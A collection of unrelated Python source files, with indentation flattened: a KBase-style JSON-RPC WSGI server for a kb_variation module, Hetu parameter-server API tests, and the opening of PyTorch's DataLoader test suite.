sel.register(sys.stdin, selectors.EVENT_READ, readIn)
sel.register(serversocket, selectors.EVENT_READ, accept)
while True:
events = sel.select(1)
for key, mask in events:
callback = key.data
callback()
|
kb_variationServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_variation.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_variation'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_variation.kb_variationImpl import kb_variation # noqa @IgnorePep8
impl_kb_variation = kb_variation(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_variation'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_variation.run_kb_variation,
name='kb_variation.run_kb_variation',
types=[dict])
self.method_authentication['kb_variation.run_kb_variation'] = 'required' # noqa
self.rpc_service.add(impl_kb_variation.status,
name='kb_variation.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_variation ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
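# Small usage sketch for the helpers above (port/URL are placeholders):
#
#   port = start_server(newprocess=True)   # returns the bound port
#   # POST JSON-RPC requests to http://localhost:<port>, e.g. kb_variation.status
#   stop_server()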
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_apis.py
|
import hetu as ht
import time
import os
import sys
import yaml
import multiprocessing
from multiprocessing.sharedctypes import RawArray as rarr
import argparse
import signal
import numpy as np
from scipy.stats import truncnorm
import ctypes
import matplotlib.pyplot as plt
nitem = 2000
item_len = 1000
indx1 = 30
indx2 = 40
def test_init_ps(rarr, init_type, init_a, init_b=1.0, sparse=False):
assert init_type in ('constant', 'uniform', 'normal', 'truncated_normal')
init_type_map = {'constant': 0, 'uniform': 1,
'normal': 2, 'truncated_normal': 3}
ctx = ht.cpu(0)
rank = int(os.environ["WORKER_ID"])
nrank = int(os.environ["DMLC_NUM_WORKER"])
local_arr = np.frombuffer(rarr, dtype=np.float32).reshape(nitem, item_len)
if rank == 0:
arr = ht.array(local_arr, ctx=ctx)
else:
arr = ht.empty((nitem, item_len), ctx=ctx)
comm = ht.get_worker_communicate()
if sparse:
arr_len = ctypes.c_int(nitem)
arr_wid = ctypes.c_int(item_len)
else:
arr_len = ctypes.c_int(nitem * item_len)
arr_wid = ctypes.c_int(1)
itype = ctypes.c_int(init_type_map[init_type])
comm.InitTensor(ctypes.c_int(0), ctypes.c_int(sparse), arr_len, arr_wid, itype, ctypes.c_double(
init_a), ctypes.c_double(init_b), ctypes.c_ulonglong(123), ctypes.c_int(0), (ctypes.c_float * 1)(0.1), ctypes.c_int(1))
comm.Pull(ctypes.c_int(0), arr.handle)
comm.Wait(ctypes.c_int(0))
if rank == 0:
local_arr[:] = arr.asnumpy()
comm.BarrierWorker()
if rank != 0:
np.testing.assert_allclose(local_arr, arr.asnumpy(), rtol=5e-7)
else:
if init_type == 'constant':
np.testing.assert_allclose(
np.full((nitem, item_len), init_a), arr.asnumpy(), rtol=5e-7)
else:
if init_type == 'uniform':
numpy_samples = np.random.uniform(
low=init_a, high=init_b, size=(nitem, item_len)).astype(np.float32)
elif init_type == 'normal':
numpy_samples = np.random.normal(
loc=init_a, scale=init_b, size=(nitem, item_len)).astype(np.float32)
else:
numpy_samples = truncnorm.rvs(-2.0, 2.0, loc=init_a,
scale=init_b, size=(nitem, item_len)).astype(np.float32)
fig, ax = plt.subplots(1, 1)
ax.hist(numpy_samples.flatten(), histtype='stepfilled',
alpha=0.2, bins=50, label='numpy')
ax.hist(local_arr.flatten(), histtype='step',
alpha=0.2, bins=50, label='ps')
ax.legend(loc='best', frameon=False)
# ax2.legend(loc='best', frameon=False)
file_name = '%s_%.1f_%.1f_%d.png' % (
init_type, init_a, init_b, int(sparse))
plt.savefig(file_name)
print('Check file %s.' % file_name)
print('Init parameters %d/%d passed.' % (rank, nrank))
if rank == 0:
comm.ClearOnServer(0)
comm.Clear(0)
comm.BarrierWorker()
def test_api(rarr, rpush, rpull, sparse=False, lr=0.5):
ctx = ht.cpu(0)
rank = int(os.environ["WORKER_ID"])
nrank = int(os.environ["DMLC_NUM_WORKER"])
local_arr = np.frombuffer(rarr, dtype=np.float32).reshape(
nitem, item_len).copy()
local_push = np.frombuffer(rpush, dtype=np.float32).copy()
local_pull = np.frombuffer(rpull, dtype=np.float32).copy()
if rank == 0:
arr = ht.array(local_arr, ctx=ctx)
else:
arr = ht.empty((nitem, item_len), ctx=ctx)
comm = ht.get_worker_communicate()
if sparse:
arr_len = ctypes.c_int(nitem)
arr_wid = ctypes.c_int(item_len)
else:
arr_len = ctypes.c_int(nitem * item_len)
arr_wid = ctypes.c_int(1)
comm.InitTensor(ctypes.c_int(0), ctypes.c_int(sparse), arr_len, arr_wid, ctypes.c_int(0), ctypes.c_double(0.0), ctypes.c_double(1.0), ctypes.c_ulonglong(123),
ctypes.c_int(0), (ctypes.c_float * 1)(lr), ctypes.c_int(1))
if sparse:
local_arr[:] = 0
for j in local_push:
local_arr[int(j)] += 1
if rank == 0:
push_ind = ht.array(local_push.reshape(indx1, indx2), ctx=ctx)
push_val = ht.array(
np.ones((indx1, indx2, item_len)).astype(np.float32), ctx=ctx)
comm.SparsePush(0, push_ind.handle, push_val.handle, None)
comm.Wait(0)
comm.BarrierWorker()
comm.Pull(0, arr.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr, arr.asnumpy(), rtol=5e-7)
print('SparsePush DensePull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
for j in local_push:
local_arr[int(j)] += 1
if rank == 0:
push_ind = ht.array(local_push.reshape(indx1, indx2), ctx=ctx)
push_val = ht.array(
np.ones((indx1, indx2, item_len)).astype(np.float32), ctx=ctx)
comm.SDPushPull(0, push_ind.handle,
push_val.handle, arr.handle, None)
comm.Wait(0)
comm.BarrierWorker()
if rank != 0:
comm.Pull(0, arr.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr, arr.asnumpy(), rtol=5e-7)
print('SDPushPull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
for j in local_push:
local_arr[int(j)] += 1
pull_ind = ht.array(local_pull.reshape(indx1, indx2), ctx=ctx)
pull_val = ht.empty((indx1, indx2, item_len), ctx=ctx)
if rank == 0:
push_ind = ht.array(local_push.reshape(indx1, indx2), ctx=ctx)
push_val = ht.array(
np.ones((indx1, indx2, item_len)).astype(np.float32), ctx=ctx)
comm.SSPushPull(0, push_ind.handle, push_val.handle,
pull_ind.handle, pull_val.handle, None)
comm.Wait(0)
comm.BarrierWorker()
if rank != 0:
comm.SparsePull(0, pull_ind.handle, pull_val.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr[local_pull.astype(int)].reshape(
indx1, indx2, item_len), pull_val.asnumpy(), rtol=5e-7)
print('SSPushPull and SparsePull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
else:
if rank == 0:
comm.Push(0, arr.handle, None)
comm.Wait(0)
comm.BarrierWorker()
comm.Pull(0, arr.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr, arr.asnumpy(), rtol=5e-7)
print('DensePush DensePull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
if rank == 0:
temp_push_val = ht.array(
np.ones((nitem, item_len)).astype(np.float32), ctx=ctx)
comm.DDPushPull(0, temp_push_val.handle, arr.handle, None)
comm.Wait(0)
comm.BarrierWorker()
if rank != 0:
comm.Pull(0, arr.handle)
comm.Wait(0)
np.testing.assert_allclose(local_arr + 1, arr.asnumpy())
print('DenseDensePushPull %d/%d passed.' % (rank, nrank))
comm.BarrierWorker()
if rank == 0:
comm.ClearOnServer(0)
comm.Clear(0)
comm.BarrierWorker()
def start_process(settings, args, arr=None, push_arr=None, pull_arr=None):
for key, value in settings.items():
os.environ[key] = str(value)
if os.environ['DMLC_ROLE'] == "server":
ht.server_init()
ht.server_finish()
elif os.environ['DMLC_ROLE'] == "worker":
ht.worker_init()
test_api(arr, push_arr, pull_arr)
test_init_ps(arr, 'constant', 1234.567)
test_init_ps(arr, 'uniform', -0.5, 0.4)
test_init_ps(arr, 'normal', 5.6, 2.0)
test_init_ps(arr, 'truncated_normal', -2.3, 1.4)
test_api(arr, push_arr, pull_arr, True)
test_init_ps(arr, 'constant', 1234.567, True)
test_init_ps(arr, 'uniform', -0.5, 0.4, True)
test_init_ps(arr, 'normal', 5.6, 2.0, True)
test_init_ps(arr, 'truncated_normal', -2.3, 1.4, True)
ht.worker_finish()
elif os.environ['DMLC_ROLE'] == "scheduler":
ht.scheduler_init()
ht.scheduler_finish()
else:
raise ValueError("Unknown role", os.environ['DMLC_ROLE'])
def signal_handler(signal, frame):
print("SIGINT signal caught, stop Training")
for proc in process_list:
proc.kill()
exit(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--config", default='./local_s2_w2.yml')
args = parser.parse_args()
settings = yaml.load(open(args.config).read(), Loader=yaml.FullLoader)
process_list = []
arr = rarr('f', np.random.rand(nitem * item_len,).astype(np.float32))
push_arr = rarr('f', np.random.randint(
0, nitem, (indx1 * indx2)).astype(np.float32))
pull_arr = rarr('f', np.random.randint(
0, nitem, (indx1 * indx2)).astype(np.float32))
for key, value in settings.items():
if key != 'shared':
if key[0] != 'w':
proc = multiprocessing.Process(
target=start_process, args=[value, args])
else:
proc = multiprocessing.Process(target=start_process, args=[
value, args, arr, push_arr, pull_arr])
process_list.append(proc)
proc.start()
signal.signal(signal.SIGINT, signal_handler)
for proc in process_list:
proc.join()
|
test_dataloader.py
|
# Owner(s): ["module: dataloader"]
import math
import sys
import errno
import multiprocessing
import os
import ctypes
import faulthandler
import torch
import gc
import time
import signal
import unittest
import itertools
import warnings
import tempfile
from torch import multiprocessing as mp
from torch.utils.data import (
ChainDataset,
ConcatDataset,
DataLoader,
DataLoader2,
Dataset,
IterableDataset,
Subset,
TensorDataset,
communication,
_utils
)
from torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL
from torch.utils.data.dataset import random_split
from torch.utils.data.datapipes.iter import IterableWrapper
from torch.utils.data.datapipes.map import SequenceWrapper
from torch._utils import ExceptionWrapper
from torch.testing._internal.common_utils import (TestCase, run_tests, TEST_NUMPY, IS_WINDOWS,
IS_IN_CI, NO_MULTIPROCESSING_SPAWN, skipIfRocm, slowTest,
load_tests, TEST_WITH_ASAN, TEST_WITH_TSAN, IS_SANDCASTLE)
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
err_msg = ("psutil not found. Some critical data loader tests relying on it "
"(e.g., TestDataLoader.test_proper_exit) will not run.")
if IS_IN_CI:
raise ImportError(err_msg) from None
else:
warnings.warn(err_msg)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = unittest.skipIf(not HAS_DILL, "no dill")
# load_tests from torch.testing._internal.common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA from torch.testing._internal.common_cuda here, because if we do that,
# the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
if TEST_CUDA:
dev_name = torch.cuda.get_device_name(torch.cuda.current_device()).lower()
IS_JETSON = 'xavier' in dev_name or 'nano' in dev_name or 'jetson' in dev_name or 'tegra' in dev_name
else:
IS_JETSON = False
if not NO_MULTIPROCESSING_SPAWN:
# We want to use `spawn` if able because some of our tests check that the
    # data loader terminates gracefully. To prevent hanging in the testing
# process, such data loaders are run in a separate subprocess.
#
# We also want to test the `pin_memory=True` configuration, thus `spawn` is
# required to launch such processes and they initialize the CUDA context.
#
    # Mixing different start methods is a recipe for disaster (e.g., using a fork
# `mp.Event` with a spawn `mp.Process` segfaults). So we set this globally
# to avoid bugs.
#
    # Get a multiprocessing context because some tests / third-party libraries
    # set start_method when imported, and setting it again triggers `RuntimeError`.
mp = mp.get_context(method='spawn')
# 60s of timeout?
# Yes, in environments where physical CPU resources are shared, e.g., CI, the
# time for an inter-process communication can vary widely. With 15~17s of
# timeout, we have observed flakiness in some CI builds (see
# pytorch/pytorch#14501, pytorch/pytorch#16608). We follow the CPython
# multiprocessing setup and set the timeout to 60s here:
#
# https://github.com/python/cpython/blob/e8113f51a8bdf33188ee30a1c038a298329e7bfa/Lib/test/_test_multiprocessing.py#L73
JOIN_TIMEOUT = 60.0 # seconds
supported_multiprocessing_contexts = [None] + list(torch.multiprocessing.get_all_start_methods())
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_dataset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
def test_splits_indexing_type(self):
r"""Indices generated by random_split
should be of integer type
"""
class CustomDataset():
def __init__(self, test_object, custom_list):
self.data = custom_list
self.test_object = test_object
def __getitem__(self, key):
self.test_object.assertEqual(type(key), type(0))
return self.data[key]
def __len__(self):
return len(self.data)
x = [1, 2, 3, 4, 5]
dataset = CustomDataset(self, x)
dataset = random_split(dataset, [5])[0]
data_loader = DataLoader(dataset)
for batch in data_loader:
pass
def test_splits_reproducibility(self):
self.assertEqual(
[list(x) for x in random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(1))],
[[5, 6, 1], [2, 0, 8, 9, 3, 7, 4]],
)
self.assertEqual(
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
)
def test_splits_generator(self):
# A random_split without a specific generator should affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5])
b = torch.rand(10)
self.assertNotEqual(a, b)
# A random_split with a specific generator should not affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5], generator=torch.Generator().manual_seed(42))
b = torch.rand(10)
self.assertEqual(a, b)
def test_slicing_of_subset_of_dataset(self):
# Testing slicing a subset initialized with a dataset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_dataset[:], dataset[:])
self.assertEqual(subset_of_dataset[1:2], dataset[1:2])
self.assertEqual(subset_of_dataset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset from random split
subset1, subset2 = random_split(dataset, [3, 2])
self.assertEqual(subset1[:], dataset[subset1.indices[:]])
self.assertEqual(subset1[0:2], dataset[subset1.indices[0:2]])
self.assertEqual(subset1[0:-1:2], dataset[subset1.indices[0:-1:2]])
def test_slicing_of_subset_of_subset(self):
# Testing slicing a subset initialized with a subset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
subset_of_subset = Subset(subset_of_dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_subset[:], dataset[:])
self.assertEqual(subset_of_subset[0:2], dataset[0:2])
self.assertEqual(subset_of_subset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset of subset from random split
subset1, subset2 = random_split(dataset, [4, 1])
subset_of_subset1, subset_of_subset2 = random_split(subset1, [3, 1])
idx = [subset1.indices[i] for i in subset_of_subset1.indices]
self.assertEqual(subset_of_subset1[:], dataset[idx[:]])
self.assertEqual(subset_of_subset1[0:2], dataset[idx[0:2]])
self.assertEqual(subset_of_subset1[0:-1:2], dataset[idx[0:-1:2]])
class CUDACountingDataset(Dataset):
def __init__(self, n):
super(CUDACountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return torch.as_tensor(i, device='cuda')
def __len__(self):
return self.n
class CountingDataset(Dataset):
def __init__(self, n):
super(CountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return i
